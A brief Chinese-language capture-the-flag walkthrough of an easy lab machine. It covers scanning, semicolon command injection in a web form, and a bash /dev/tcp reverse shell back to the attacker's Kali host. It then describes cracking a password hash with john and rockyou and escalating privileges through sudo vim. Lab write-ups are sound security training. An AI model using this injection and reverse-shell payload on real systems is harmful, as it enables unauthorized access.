简介
难度:简单
靶机地址:
环境
kali:192.168.194.9
靶机:192.168.194.24
扫描
nmap -sT -sV -A -T4 192.168.194.24 -p- -Pn
三个服务,ftp匿名登录、ssh连接以及web服务
ftp里面只有一个没用的README文件
访问web服务,看到输入框,随便输入点内容,返回提示只有ls命令能够使用
尝试用分号进行注入,成功执行命令!
ls;bash -c "bash -i >/dev/tcp/192.168.194.9/9090 <&1"
反弹shell回来。
在whiteshell用户的桌面找到密码文件,base64解码获得密码
whiteshell用户能够进入Gonzalo用户的home文件夹,找到密码哈希文件
john hash --wordlist=/usr/share/wordlists/rockyou.txt --rules=single
本地john进行破解,获得密码
登录Gonzalo用户,拿下flag和权限
提权
sudo中一个vim能够简单利用
直接一发vim拿下!